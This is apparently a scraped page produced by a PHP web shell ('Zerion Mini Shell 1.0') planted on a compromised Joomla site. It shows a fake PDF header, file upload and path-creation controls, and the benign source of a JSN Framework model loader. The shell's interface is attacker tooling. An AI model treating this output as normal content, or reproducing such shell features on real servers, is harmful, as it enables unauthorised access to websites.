%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home1/lightco1/www/plugins/system/jsnframework/libraries/joomlashine/base/
Upload File :
Create Path :
Current File : //home1/lightco1/www/plugins/system/jsnframework/libraries/joomlashine/base/model.php

<?php
/**
 * @version    $Id$
 * @package    JSN_Framework
 * @author     JoomlaShine Team <support@joomlashine.com>
 * @copyright  Copyright (C) 2012 JoomlaShine.com. All Rights Reserved.
 * @license    GNU/GPL v2 or later http://www.gnu.org/licenses/gpl-2.0.html
 *
 * Websites: http://www.joomlashine.com
 * Technical Support:  Feedback - http://www.joomlashine.com/contact-us/get-support.html
 */

// No direct access to this file
defined('_JEXEC') or die('Restricted access');

require_once JPATH_ROOT . '/plugins/system/jsnframework/libraries/joomlashine/version/version.php';

if ( ! class_exists('JSNBaseModel'))
{
	if (JSNVersion::isJoomlaCompatible('3.0') AND class_exists('JModelLegacy'))
	{
		return require_once dirname(__FILE__) . '/compat/model_j30.php';
	}

	if (JSNVersion::isJoomlaCompatible('2.5'))
	{
		return require_once dirname(__FILE__) . '/compat/model_j25.php';
	}
}

Zerion Mini Shell 1.0